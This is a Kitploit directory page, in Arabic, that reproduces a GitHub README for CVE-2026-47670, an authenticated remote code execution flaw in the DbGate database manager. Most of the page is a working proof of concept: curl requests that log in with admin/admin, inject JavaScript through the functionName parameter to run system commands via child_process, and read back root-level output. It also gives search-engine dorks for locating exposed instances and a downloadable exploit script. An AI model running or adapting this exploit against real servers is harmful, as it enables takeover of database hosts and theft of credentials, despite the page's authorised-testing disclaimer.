Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-47670 — تنفيذ الأكواد عن بُعد بعد المصادقة عبر حقن الكود في معامل functionName للدالة loadReader في DbGate | Kitploit
أدوات/GitHubGitHub/error-inside/cve-2026-47670
تحليل الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمتطوير الحمولات
GitHuberror-inside/cve-2026-47670

CVE-2026-47670

تنفيذ الأكواد عن بُعد بعد المصادقة عبر حقن الكود في معامل functionName للدالة loadReader في DbGate

عرض المستودع
1منذ 2 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-47670

Python CVSS License Educational

تنفيذ كود عن بُعد بعد المصادقة عبر حقن كود في معامل functionName في دالة loadReader في DbGate

DbGate هو أداة مفتوحة المصدر لإدارة قواعد البيانات تعمل عبر المنصات، صُممت للمطورين ومسؤولي قواعد البيانات الذين يحتاجون إلى العمل مع أنظمة قواعد بيانات متعددة في وقت واحد. يوفر واجهة موحدة عبر الويب وسطح المكتب لإدارة قواعد البيانات SQL و NoSQL - بما في ذلك MySQL و PostgreSQL و SQL Server و MongoDB و SQLite و Oracle وغيرها - دون التبديل بين تطبيقات العملاء المختلفة. يعمل DbGate كتطبيق سطح مكتب مستقل على Windows و macOS و Linux، أو يمكن نشره كتطبيق ويب عبر Docker، مما يجعله شائعًا في بيئات الفرق وسيناريوهات إدارة قواعد البيانات عن بُعد.

CVE-2026-47670 هي ثغرة تنفيذ كود عن بُعد بعد المصادقة (RCE) تؤثر على إصدارات DbGate الأقدم من 7.1.9. يوجد الخلل في نقطة النهاية /runners/load-reader، حيث يتم تمرير معامل functionName إلى مسار تنفيذ كود غير آمن دون تنظيف مناسب. يمكن للمهاجم الذي يمتلك بيانات اعتماد صالحة لـ DbGate حقن كود JavaScript عشوائي عبر هذا المعامل، والذي يتم على الخادم بصلاحيات . تعد هذه الثغرة خطيرة بشكل خاص لأن التخفيف في التطبيق يمكن تجاوزه بسهولة باستخدام عبارات الديناميكية، مما يسمح للمهاجمين بـ ، ، والتنقل إلى خوادم قواعد البيانات المتصلة، أو اختراق النظام المضيف بالكامل.

تنفيذه
الجذر
require = null
import()
فتح قذائف
سرقة بيانات اعتماد قواعد البيانات

إثبات المفهوم

root@kitploit:~
# Step 1 — authenticate and obtain Bearer token
curl -s -X POST http://example.com/auth/login \
  -H 'Content-Type: application/json' \
  -d '{"amoid":"logins","login":"admin","password":"admin"}' | grep accessToken

# RESPONSE
# ========
{"accessToken":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhbW9pZCI6ImxvZ2lucyIsImxvZ2luIjoiYWRtaW4iLCJpYXQiOjE3ODE3NzMwNDIsImV4cCI6MTc4MTc3NjY0Mn0.M61gw5bidF2kyzZwRukwzv0yxm3Zj0tUItdPqCXDQ_Y"}

# Step 2 — inject via functionName (replace TOKEN and /tmp/_dbg_poc.jsonl)
curl -s -X POST http://example.com/runners/load-reader \
  -H 'Content-Type: application/json' \
  -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhbW9pZCI6ImxvZ2lucyIsImxvZ2luIjoiYWRtaW4iLCJpYXQiOjE3ODE3NzMwNDIsImV4cCI6MTc4MTc3NjY0Mn0.M61gw5bidF2kyzZwRukwzv0yxm3Zj0tUItdPqCXDQ_Y' \
  -d '{"functionName":"csvReader\nvar _f=await import(\"fs\");var _c=await import(\"child_process\");var _o=_c.execSync(\"id\").toString().trim();_f.writeFileSync(\"/tmp/_dbg_poc.jsonl\",JSON.stringify({__isStreamHeader:true,columns:[{columnName:\"out\"}]})+String.fromCharCode(10)+JSON.stringify({out:\"CANARY \"+_o})+String.fromCharCode(10));//","props":{}}'

# RESPONSE
# ========
{"apiErrorMessage":"The \"body\" argument must be of type function or an instance of Blob, ReadableStream, WritableStream, Stream, Iterable, AsyncIterable, or Promise or { readable, writable } pair. Received undefined"}

# Step 3 — read back command output
curl -s -X POST http://example.com/jsldata/get-rows \
  -H 'Content-Type: application/json' \
  -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhbW9pZCI6ImxvZ2lucyIsImxvZ2luIjoiYWRtaW4iLCJpYXQiOjE3ODE3NzMwNDIsImV4cCI6MTc4MTc3NjY0Mn0.M61gw5bidF2kyzZwRukwzv0yxm3Zj0tUItdPqCXDQ_Y' \
  -d '{"jslid":"file:///tmp/_dbg_poc.jsonl","offset":0,"limit":100}'

# RESPONSE
# ========
[{"out":"CANARY uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)"}]

الاستخدام

root@kitploit:~
python CVE-2026-47670-X7.py
  • Zern : title:"DbGate"
  • Fofa : title="DbGate"
  • Shodan : http.title:"DbGate"

الموارد

  • OpenCVE - CVE-2026-47670 (لم يُنشر بعد)
  • NIST - تفاصيل CVE-2026-47670 (لم يُنشر بعد)
  • Gitlab Advisory Database - CVE-2026-47670
  • Github - DbGate: مدير قواعد بيانات لـ MySQL و PostgreSQL و SQL Server و MongoDB و SQLite وغيرها

إخلاء المسؤولية

هذا المستودع ومحتوياته مقدمان حصريًا لأغراض البحث الأمني المشروع، واختبار الاختراق المصرح به، والدراسة التعليمية، والأغراض الدفاعية. من خلال الوصول إلى هذه المواد أو استخدامها، فإنك تقر بالمسؤولية الكاملة عن ضمان امتثال أنشطتك لجميع القوانين المعمول بها، وأنك حصلت على التفويض المناسب قبل اختبار أو تطبيق هذه التقنيات على أي نظام لا تملكه.

لا يتحمل مؤلفو هذا المشروع والقائمون على صيانته أي مسؤولية عن أي أضرار أو عواقب قانونية أو إساءة استخدام ناتجة عن تطبيق هذه المعلومات. أي استخدام للوصول غير المصرح به أو الأنشطة الخبيثة أو الأغراض غير القانونية محظور صراحةً وغير مدعوم.

استخدم بمسؤولية. التزم بالقانون. اختبر فقط ما تملكه أو لديك إذن كتابي صريح لاختباره.

المؤلفون

  • ErrorInside // SCT

الترخيص

SCT-PL

تنزيل الأداة